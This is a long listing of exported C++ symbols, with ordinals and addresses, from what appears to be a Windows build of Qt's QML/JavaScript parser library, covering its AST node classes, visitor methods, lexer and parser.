                                                                                                          ??1PropertyAssignment@AST@QQmlJS@@UAE@XZ1990x7b0ff0
                                                                                                          ??1PropertyAssignmentList@AST@QQmlJS@@UAE@XZ2000x7b0ff0
                                                                                                          ??1PropertyGetterSetter@AST@QQmlJS@@UAE@XZ2010x7b0ff0
                                                                                                          ??1PropertyName@AST@QQmlJS@@UAE@XZ2020x7b0ff0
                                                                                                          ??1PropertyNameAndValue@AST@QQmlJS@@UAE@XZ2030x7b0ff0
                                                                                                          ??1RegExpLiteral@AST@QQmlJS@@UAE@XZ2040x7b0ff0
                                                                                                          ??1ReturnStatement@AST@QQmlJS@@UAE@XZ2050x7b0ff0
                                                                                                          ??1SourceElement@AST@QQmlJS@@UAE@XZ2060x7b0ff0
                                                                                                          ??1SourceElements@AST@QQmlJS@@UAE@XZ2070x7b0ff0
                                                                                                          ??1Statement@AST@QQmlJS@@UAE@XZ2080x7b0ff0
                                                                                                          ??1StatementList@AST@QQmlJS@@UAE@XZ2090x7b0ff0
                                                                                                          ??1StatementSourceElement@AST@QQmlJS@@UAE@XZ2100x7b0ff0
                                                                                                          ??1StringLiteral@AST@QQmlJS@@UAE@XZ2110x7b0ff0
                                                                                                          ??1StringLiteralPropertyName@AST@QQmlJS@@UAE@XZ2120x7b0ff0
                                                                                                          ??1SwitchStatement@AST@QQmlJS@@UAE@XZ2130x7b0ff0
                                                                                                          ??1ThisExpression@AST@QQmlJS@@UAE@XZ2140x7b0ff0
                                                                                                          ??1ThrowStatement@AST@QQmlJS@@UAE@XZ2150x7b0ff0
                                                                                                          ??1TildeExpression@AST@QQmlJS@@UAE@XZ2160x7b0ff0
                                                                                                          ??1TrueLiteral@AST@QQmlJS@@UAE@XZ2170x7b0ff0
                                                                                                          ??1TryStatement@AST@QQmlJS@@UAE@XZ2180x7b0ff0
                                                                                                          ??1TypeOfExpression@AST@QQmlJS@@UAE@XZ2190x7b0ff0
                                                                                                          ??1UiArrayBinding@AST@QQmlJS@@UAE@XZ2200x7b0ff0
                                                                                                          ??1UiArrayMemberList@AST@QQmlJS@@UAE@XZ2210x7b0ff0
                                                                                                          ??1UiHeaderItemList@AST@QQmlJS@@UAE@XZ2220x7b0ff0
                                                                                                          ??1UiImport@AST@QQmlJS@@UAE@XZ2230x7b0ff0
                                                                                                          ??1UiObjectBinding@AST@QQmlJS@@UAE@XZ2240x7b0ff0
                                                                                                          ??1UiObjectDefinition@AST@QQmlJS@@UAE@XZ2250x7b0ff0
                                                                                                          ??1UiObjectInitializer@AST@QQmlJS@@UAE@XZ2260x7b0ff0
                                                                                                          ??1UiObjectMember@AST@QQmlJS@@UAE@XZ2270x7b0ff0
                                                                                                          ??1UiObjectMemberList@AST@QQmlJS@@UAE@XZ2280x7b0ff0
                                                                                                          ??1UiParameterList@AST@QQmlJS@@UAE@XZ2290x7b0ff0
                                                                                                          ??1UiPragma@AST@QQmlJS@@UAE@XZ2300x7b0ff0
                                                                                                          ??1UiProgram@AST@QQmlJS@@UAE@XZ2310x7b0ff0
                                                                                                          ??1UiPublicMember@AST@QQmlJS@@UAE@XZ2320x7b0ff0
                                                                                                          ??1UiQualifiedId@AST@QQmlJS@@UAE@XZ2330x7b0ff0
                                                                                                          ??1UiQualifiedPragmaId@AST@QQmlJS@@UAE@XZ2340x7b0ff0
                                                                                                          ??1UiScriptBinding@AST@QQmlJS@@UAE@XZ2350x7b0ff0
                                                                                                          ??1UiSourceElement@AST@QQmlJS@@UAE@XZ2360x7b0ff0
                                                                                                          ??1UnaryMinusExpression@AST@QQmlJS@@UAE@XZ2370x7b0ff0
                                                                                                          ??1UnaryPlusExpression@AST@QQmlJS@@UAE@XZ2380x7b0ff0
                                                                                                          ??1VariableDeclaration@AST@QQmlJS@@UAE@XZ2390x7b0ff0
                                                                                                          ??1VariableDeclarationList@AST@QQmlJS@@UAE@XZ2400x7b0ff0
                                                                                                          ??1VariableStatement@AST@QQmlJS@@UAE@XZ2410x7b0ff0
                                                                                                          ??1Visitor@AST@QQmlJS@@UAE@XZ2420x7d2310
                                                                                                          ??1VoidExpression@AST@QQmlJS@@UAE@XZ2430x7b0ff0
                                                                                                          ??1WhileStatement@AST@QQmlJS@@UAE@XZ2440x7b0ff0
                                                                                                          ??1WithStatement@AST@QQmlJS@@UAE@XZ2450x7b0ff0
                                                                                                          ??2Managed@QQmlJS@@SAPAXIPAVMemoryPool@1@@Z2460x7b1090
                                                                                                          ??3Managed@QQmlJS@@SAXPAX@Z2470x8e10b0
                                                                                                          ??3Managed@QQmlJS@@SAXPAXPAVMemoryPool@1@@Z2480x8e10b0
                                                                                                          ??4DiagnosticMessage@QQmlJS@@QAEAAV01@ABV01@@Z2490x7b10c0
                                                                                                          ??4Directives@QQmlJS@@QAEAAV01@ABV01@@Z2500x7c6c00
                                                                                                          ??4Lexer@QQmlJS@@QAEAAV01@ABV01@@Z2510x7c6c10
                                                                                                          ??4Parser@QQmlJS@@QAEAAV01@ABV01@@Z2520x7c6cf0
                                                                                                          ??4Visitor@AST@QQmlJS@@QAEAAV012@ABV012@@Z2530x7c6c00
                                                                                                          ??_7ArgumentList@AST@QQmlJS@@6B@2540xf8b15c
                                                                                                          ??_7ArrayLiteral@AST@QQmlJS@@6B@2550xf8aee8
                                                                                                          ??_7ArrayMemberExpression@AST@QQmlJS@@6B@2560xf8b0a8
                                                                                                          ??_7BinaryExpression@AST@QQmlJS@@6B@2570xf8b30c
                                                                                                          ??_7Block@AST@QQmlJS@@6B@2580xf8b378
                                                                                                          ??_7BreakStatement@AST@QQmlJS@@6B@2590xf8b594
                                                                                                          ??_7CallExpression@AST@QQmlJS@@6B@2600xf8b138
                                                                                                          ??_7CaseBlock@AST@QQmlJS@@6B@2610xf8b600
                                                                                                          ??_7CaseClause@AST@QQmlJS@@6B@2620xf8b648
                                                                                                          ??_7CaseClauses@AST@QQmlJS@@6B@2630xf8b66c
                                                                                                          ??_7Catch@AST@QQmlJS@@6B@2640xf8b6fc
                                                                                                          ??_7ConditionalExpression@AST@QQmlJS@@6B@2650xf8b330
                                                                                                          ??_7ContinueStatement@AST@QQmlJS@@6B@2660xf8b570
                                                                                                          ??_7DebuggerStatement@AST@QQmlJS@@6B@2670xf8b8ac
                                                                                                          ??_7DefaultClause@AST@QQmlJS@@6B@2680xf8b690
                                                                                                          ??_7DeleteExpression@AST@QQmlJS@@6B@2690xf8b1c8
                                                                                                          ??_7Directives@QQmlJS@@6B@2700xf8d1f0
                                                                                                          ??_7DoWhileStatement@AST@QQmlJS@@6B@2710xf8b498
                                                                                                          ??_7ElementList@AST@QQmlJS@@6B@2720xf8af54
                                                                                                          ??_7Elision@AST@QQmlJS@@6B@2730xf8af30
                                                                                                          ??_7EmptyStatement@AST@QQmlJS@@6B@2740xf8b42c
                                                                                                          ??_7Expression@AST@QQmlJS@@6B@2750xf8b354
                                                                                                          ??_7ExpressionNode@AST@QQmlJS@@6B@2760xf8ad5c
                                                                                                          ??_7ExpressionStatement@AST@QQmlJS@@6B@2770xf8b450
                                                                                                          ??_7FalseLiteral@AST@QQmlJS@@6B@2780xf8ae58
                                                                                                          ??_7FieldMemberExpression@AST@QQmlJS@@6B@2790xf8b0cc
                                                                                                          ??_7Finally@AST@QQmlJS@@6B@2800xf8b720
                                                                                                          ??_7ForEachStatement@AST@QQmlJS@@6B@2810xf8b528
                                                                                                          ??_7ForStatement@AST@QQmlJS@@6B@2820xf8b4e0
                                                                                                          ??_7FormalParameterList@AST@QQmlJS@@6B@2830xf8b7b0
                                                                                                          ??_7FunctionBody@AST@QQmlJS@@6B@2840xf8b81c
                                                                                                          ??_7FunctionDeclaration@AST@QQmlJS@@6B@2850xf8b78c
                                                                                                          ??_7FunctionExpression@AST@QQmlJS@@6B@2860xf8b768
                                                                                                          ??_7FunctionSourceElement@AST@QQmlJS@@6B@2870xf8b864
                                                                                                          ??_7IdentifierExpression@AST@QQmlJS@@6B@2880xf8adec
                                                                                                          ??_7IdentifierPropertyName@AST@QQmlJS@@6B@2890xf8b030
                                                                                                          ??_7IfStatement@AST@QQmlJS@@6B@2900xf8b474
                                                                                                          ??_7LabelledStatement@AST@QQmlJS@@6B@2910xf8b6b4
                                                                                                          ??_7LocalForEachStatement@AST@QQmlJS@@6B@2920xf8b54c
                                                                                                          ??_7LocalForStatement@AST@QQmlJS@@6B@2930xf8b504
                                                                                                          ??_7NestedExpression@AST@QQmlJS@@6B@2940xf8ada4
                                                                                                          ??_7NewExpression@AST@QQmlJS@@6B@2950xf8b114
                                                                                                          ??_7NewMemberExpression@AST@QQmlJS@@6B@2960xf8b0f0
                                                                                                          ??_7Node@AST@QQmlJS@@6B@2970xf8ad38
                                                                                                          ??_7NotExpression@AST@QQmlJS@@6B@2980xf8b2e8
                                                                                                          ??_7NullExpression@AST@QQmlJS@@6B@2990xf8ae10
                                                                                                          ??_7NumericLiteral@AST@QQmlJS@@6B@3000xf8ae7c
                                                                                                          ??_7NumericLiteralPropertyName@AST@QQmlJS@@6B@3010xf8b080
                                                                                                          ??_7ObjectLiteral@AST@QQmlJS@@6B@3020xf8af0c
                                                                                                          ??_7PostDecrementExpression@AST@QQmlJS@@6B@3030xf8b1a4
                                                                                                          ??_7PostIncrementExpression@AST@QQmlJS@@6B@3040xf8b180
                                                                                                          ??_7PreDecrementExpression@AST@QQmlJS@@6B@3050xf8b258
                                                                                                          ??_7PreIncrementExpression@AST@QQmlJS@@6B@3060xf8b234
                                                                                                          ??_7Program@AST@QQmlJS@@6B@3070xf8b840
                                                                                                          ??_7PropertyAssignment@AST@QQmlJS@@6B@3080xf8afa0
                                                                                                          ??_7PropertyAssignmentList@AST@QQmlJS@@6B@3090xf8afc4
                                                                                                          ??_7PropertyGetterSetter@AST@QQmlJS@@6B@3100xf8b00c
                                                                                                          ??_7PropertyName@AST@QQmlJS@@6B@3110xf8af78
                                                                                                          ??_7PropertyNameAndValue@AST@QQmlJS@@6B@3120xf8afe8
                                                                                                          ??_7RegExpLiteral@AST@QQmlJS@@6B@3130xf8aec4
                                                                                                          ??_7ReturnStatement@AST@QQmlJS@@6B@3140xf8b5b8
                                                                                                          ??_7SourceElement@AST@QQmlJS@@6B@3150xf8b7d4
                                                                                                          ??_7SourceElements@AST@QQmlJS@@6B@3160xf8b7f8
                                                                                                          ??_7Statement@AST@QQmlJS@@6B@3170xf8ad80
                                                                                                          ??_7StatementList@AST@QQmlJS@@6B@3180xf8b39c
                                                                                                          ??_7StatementSourceElement@AST@QQmlJS@@6B@3190xf8b888
                                                                                                          ??_7StringLiteral@AST@QQmlJS@@6B@3200xf8aea0
                                                                                                          ??_7StringLiteralPropertyName@AST@QQmlJS@@6B@3210xf8b058
                                                                                                          ??_7SwitchStatement@AST@QQmlJS@@6B@3220xf8b624
                                                                                                          ??_7ThisExpression@AST@QQmlJS@@6B@3230xf8adc8
                                                                                                          ??_7ThrowStatement@AST@QQmlJS@@6B@3240xf8b6d8
                                                                                                          ??_7TildeExpression@AST@QQmlJS@@6B@3250xf8b2c4
                                                                                                          ??_7TrueLiteral@AST@QQmlJS@@6B@3260xf8ae34
                                                                                                          ??_7TryStatement@AST@QQmlJS@@6B@3270xf8b744
                                                                                                          ??_7TypeOfExpression@AST@QQmlJS@@6B@3280xf8b210
                                                                                                          ??_7UiArrayBinding@AST@QQmlJS@@6B@3290xf8bb10
                                                                                                          ??_7UiArrayMemberList@AST@QQmlJS@@6B@3300xf8b9f0
                                                                                                          ??_7UiHeaderItemList@AST@QQmlJS@@6B@3310xf8b9a8
                                                                                                          ??_7UiImport@AST@QQmlJS@@6B@3320xf8b8f4
                                                                                                          ??_7UiObjectBinding@AST@QQmlJS@@6B@3330xf8bac8
                                                                                                          ??_7UiObjectDefinition@AST@QQmlJS@@6B@3340xf8ba80
                                                                                                          ??_7UiObjectInitializer@AST@QQmlJS@@6B@3350xf8ba14
                                                                                                          ??_7UiObjectMember@AST@QQmlJS@@6B@3360xf8b918
                                                                                                          ??_7UiObjectMemberList@AST@QQmlJS@@6B@3370xf8b93c
                                                                                                          ??_7UiParameterList@AST@QQmlJS@@6B@3380xf8ba38
                                                                                                          ??_7UiPragma@AST@QQmlJS@@6B@3390xf8b984
                                                                                                          ??_7UiProgram@AST@QQmlJS@@6B@3400xf8b9cc
                                                                                                          ??_7UiPublicMember@AST@QQmlJS@@6B@3410xf8ba5c
                                                                                                          ??_7UiQualifiedId@AST@QQmlJS@@6B@3420xf8b8d0
                                                                                                          ??_7UiQualifiedPragmaId@AST@QQmlJS@@6B@3430xf8b960
                                                                                                          ??_7UiScriptBinding@AST@QQmlJS@@6B@3440xf8baec
                                                                                                          ??_7UiSourceElement@AST@QQmlJS@@6B@3450xf8baa4
                                                                                                          ??_7UnaryMinusExpression@AST@QQmlJS@@6B@3460xf8b2a0
                                                                                                          ??_7UnaryPlusExpression@AST@QQmlJS@@6B@3470xf8b27c
                                                                                                          ??_7VariableDeclaration@AST@QQmlJS@@6B@3480xf8b3e4
                                                                                                          ??_7VariableDeclarationList@AST@QQmlJS@@6B@3490xf8b408
                                                                                                          ??_7VariableStatement@AST@QQmlJS@@6B@3500xf8b3c0
                                                                                                          ??_7Visitor@AST@QQmlJS@@6B@3510xf8aa48
                                                                                                          ??_7VoidExpression@AST@QQmlJS@@6B@3520xf8b1ec
                                                                                                          ??_7WhileStatement@AST@QQmlJS@@6B@3530xf8b4bc
                                                                                                          ??_7WithStatement@AST@QQmlJS@@6B@3540xf8b5dc
                                                                                                          ??_FContinueStatement@AST@QQmlJS@@QAEXXZ3550x7b18d0
                                                                                                          ?accept0@ArgumentList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3560x7d2320
                                                                                                          ?accept0@ArrayLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3570x7d2380
                                                                                                          ?accept0@ArrayMemberExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3580x7d2400
                                                                                                          ?accept0@BinaryExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3590x7d2480
                                                                                                          ?accept0@Block@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3600x7d2500
                                                                                                          ?accept0@BreakStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3610x7d2550
                                                                                                          ?accept0@CallExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3620x7d2570
                                                                                                          ?accept0@CaseBlock@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3630x7d25f0
                                                                                                          ?accept0@CaseClause@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3640x7d2690
                                                                                                          ?accept0@CaseClauses@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3650x7d2710
                                                                                                          ?accept0@Catch@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3660x7d2770
                                                                                                          ?accept0@ConditionalExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3670x7d27c0
                                                                                                          ?accept0@ContinueStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3680x7d2860
                                                                                                          ?accept0@DebuggerStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3690x7d2880
                                                                                                          ?accept0@DefaultClause@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3700x7d28a0
                                                                                                          ?accept0@DeleteExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3710x7d28f0
                                                                                                          ?accept0@DoWhileStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3720x7d2940
                                                                                                          ?accept0@ElementList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3730x7d29c0
                                                                                                          ?accept0@Elision@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3740x7d2a50
                                                                                                          ?accept0@EmptyStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3750x7d2a80
                                                                                                          ?accept0@Expression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3760x7d2ab0
                                                                                                          ?accept0@ExpressionStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3770x7d2b30
                                                                                                          ?accept0@FalseLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3780x7d2b80
                                                                                                          ?accept0@FieldMemberExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3790x7d2bb0
                                                                                                          ?accept0@Finally@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3800x7d2c00
                                                                                                          ?accept0@ForEachStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3810x7d2c50
                                                                                                          ?accept0@ForStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3820x7d2cf0
                                                                                                          ?accept0@FormalParameterList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3830x7d2db0
                                                                                                          ?accept0@FunctionBody@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3840x7d2dd0
                                                                                                          ?accept0@FunctionDeclaration@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3850x7d2e20
                                                                                                          ?accept0@FunctionExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3860x7d2ea0
                                                                                                          ?accept0@FunctionSourceElement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3870x7d2f20
                                                                                                          ?accept0@IdentifierExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3880x7d2f70
                                                                                                          ?accept0@IdentifierPropertyName@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3890x7d2fa0
                                                                                                          ?accept0@IfStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3900x7d2fd0
                                                                                                          ?accept0@LabelledStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3910x7d3070
                                                                                                          ?accept0@LocalForEachStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3920x7d30c0
                                                                                                          ?accept0@LocalForStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3930x7d3160
                                                                                                          ?accept0@NestedExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3940x7d3220
                                                                                                          ?accept0@NewExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3950x7d3270
                                                                                                          ?accept0@NewMemberExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3960x7d32c0
                                                                                                          ?accept0@NotExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3970x7d3340
                                                                                                          ?accept0@NullExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3980x7d3390
                                                                                                          ?accept0@NumericLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z3990x7d33c0
                                                                                                          ?accept0@NumericLiteralPropertyName@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4000x7d33f0
                                                                                                          ?accept0@ObjectLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4010x7d3420
                                                                                                          ?accept0@PostDecrementExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4020x7d3470
                                                                                                          ?accept0@PostIncrementExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4030x7d34c0
                                                                                                          ?accept0@PreDecrementExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4040x7d3510
                                                                                                          ?accept0@PreIncrementExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4050x7d3560
                                                                                                          ?accept0@Program@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4060x7d35b0
                                                                                                          ?accept0@PropertyAssignmentList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4070x7d3600
                                                                                                          ?accept0@PropertyGetterSetter@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4080x7d3660
                                                                                                          ?accept0@PropertyNameAndValue@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4090x7d3700
                                                                                                          ?accept0@RegExpLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4100x7d3780
                                                                                                          ?accept0@ReturnStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4110x7d37b0
                                                                                                          ?accept0@SourceElements@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4120x7d3800
                                                                                                          ?accept0@StatementList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4130x7d3860
                                                                                                          ?accept0@StatementSourceElement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4140x7d38c0
                                                                                                          ?accept0@StringLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4150x7d3910
                                                                                                          ?accept0@StringLiteralPropertyName@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4160x7d3940
                                                                                                          ?accept0@SwitchStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4170x7d3970
                                                                                                          ?accept0@ThisExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4180x7d39f0
                                                                                                          ?accept0@ThrowStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4190x7d3a20
                                                                                                          ?accept0@TildeExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4200x7d3a70
                                                                                                          ?accept0@TrueLiteral@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4210x7d3ac0
                                                                                                          ?accept0@TryStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4220x7d3af0
                                                                                                          ?accept0@TypeOfExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4230x7d3b90
                                                                                                          ?accept0@UiArrayBinding@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4240x7d3be0
                                                                                                          ?accept0@UiArrayMemberList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4250x7d3c60
                                                                                                          ?accept0@UiHeaderItemList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4260x7d3cc0
                                                                                                          ?accept0@UiImport@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4270x7d3d40
                                                                                                          ?accept0@UiObjectBinding@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4280x7d3d90
                                                                                                          ?accept0@UiObjectDefinition@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4290x7d3e30
                                                                                                          ?accept0@UiObjectInitializer@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4300x7d3eb0
                                                                                                          ?accept0@UiObjectMemberList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4310x7d3f00
                                                                                                          ?accept0@UiParameterList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4320x7d3f60
                                                                                                          ?accept0@UiPragma@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4330x7d3f90
                                                                                                          ?accept0@UiProgram@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4340x7d3fe0
                                                                                                          ?accept0@UiPublicMember@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4350x7d4060
                                                                                                          ?accept0@UiQualifiedId@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4360x7d40e0
                                                                                                          ?accept0@UiQualifiedPragmaId@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4370x7d4110
                                                                                                          ?accept0@UiScriptBinding@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4380x7d4140
                                                                                                          ?accept0@UiSourceElement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4390x7d41c0
                                                                                                          ?accept0@UnaryMinusExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4400x7d4210
                                                                                                          ?accept0@UnaryPlusExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4410x7d4260
                                                                                                          ?accept0@VariableDeclaration@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4420x7d42b0
                                                                                                          ?accept0@VariableDeclarationList@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4430x7d4300
                                                                                                          ?accept0@VariableStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4440x7d4360
                                                                                                          ?accept0@VoidExpression@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4450x7d43b0
                                                                                                          ?accept0@WhileStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4460x7d4400
                                                                                                          ?accept0@WithStatement@AST@QQmlJS@@UAEXPAVVisitor@23@@Z4470x7d4480
                                                                                                          ?accept@Node@AST@QQmlJS@@QAEXPAVVisitor@23@@Z4480x7d4500
                                                                                                          ?accept@Node@AST@QQmlJS@@SAXPAV123@PAVVisitor@23@@Z4490x7d4530
                                                                                                          ?acceptChild@Node@AST@QQmlJS@@SAXPAV123@PAVVisitor@23@@Z4500x7b1930
                                                                                                          ?addComment@Engine@QQmlJS@@QAEXHHHH@Z4510x8b0a10
                                                                                                          ?allocate@MemoryPool@QQmlJS@@QAEPAXI@Z4520x7b1940
                                                                                                          ?allocate_helper@MemoryPool@QQmlJS@@AAEPAXI@Z4530x7b1970
                                                                                                          ?asString@IdentifierPropertyName@AST@QQmlJS@@UBE?AVQString@@XZ4540x7b1af0
                                                                                                          ?asString@NumericLiteralPropertyName@AST@QQmlJS@@UBE?AVQString@@XZ4550x7b1b10
                                                                                                          ?asString@StringLiteralPropertyName@AST@QQmlJS@@UBE?AVQString@@XZ4560x7b1af0
                                                                                                          ?ast@Parser@QQmlJS@@QBEPAVUiProgram@AST@2@XZ4570x7c7bc0
                                                                                                          ?binaryExpressionCast@BinaryExpression@AST@QQmlJS@@UAEPAV123@XZ4580x8ac730
                                                                                                          ?binaryExpressionCast@Node@AST@QQmlJS@@UAEPAVBinaryExpression@23@XZ4590x881d50
                                                                                                          ?canInsertAutomaticSemicolon@Lexer@QQmlJS@@QBE_NH@Z4600x8b0e90
                                                                                                          ?classify@Lexer@QQmlJS@@IAEHPBVQChar@@H_N@Z4610x8b1da0
                                                                                                          ?code@Engine@QQmlJS@@QBEABVQString@@XZ4620x7d6390
                                                                                                          ?code@Lexer@QQmlJS@@QBE?AVQString@@XZ4630x8c5bc0
                                                                                                          ?comments@Engine@QQmlJS@@QBE?AV?$QList@VSourceLocation@AST@QQmlJS@@@@XZ4640x8b0a50
                                                                                                          ?decodeHexEscapeCharacter@Lexer@QQmlJS@@AAE?AVQChar@@PA_N@Z4650x8b2010
                                                                                                          ?decodeUnicodeEscapeCharacter@Lexer@QQmlJS@@AAE?AVQChar@@PA_N@Z4660x8b20d0
                                                                                                          ?diagnosticMessage@Parser@QQmlJS@@QBE?AVDiagnosticMessage@2@XZ4670x7c84e0
                                                                                                          ?diagnosticMessages@Parser@QQmlJS@@QBE?AV?$QList@VDiagnosticMessage@QQmlJS@@@@XZ4680x7c8630
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVArgumentList@23@@Z4690x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVArrayLiteral@23@@Z4700x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVArrayMemberExpression@23@@Z4710x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVBinaryExpression@23@@Z4720x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVBlock@23@@Z4730x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVBreakStatement@23@@Z4740x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVCallExpression@23@@Z4750x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVCaseBlock@23@@Z4760x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVCaseClause@23@@Z4770x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVCaseClauses@23@@Z4780x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVCatch@23@@Z4790x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVConditionalExpression@23@@Z4800x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVContinueStatement@23@@Z4810x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVDebuggerStatement@23@@Z4820x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVDefaultClause@23@@Z4830x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVDeleteExpression@23@@Z4840x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVDoWhileStatement@23@@Z4850x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVElementList@23@@Z4860x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVElision@23@@Z4870x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVEmptyStatement@23@@Z4880x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVExpression@23@@Z4890x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVExpressionStatement@23@@Z4900x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFalseLiteral@23@@Z4910x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFieldMemberExpression@23@@Z4920x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFinally@23@@Z4930x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVForEachStatement@23@@Z4940x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVForStatement@23@@Z4950x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFormalParameterList@23@@Z4960x7b1f70
                                                                                                          ?endVisit@Visitor@AST@QQmlJS@@UAEXPAVFunctionBody@23@@Z4970x7b1f70
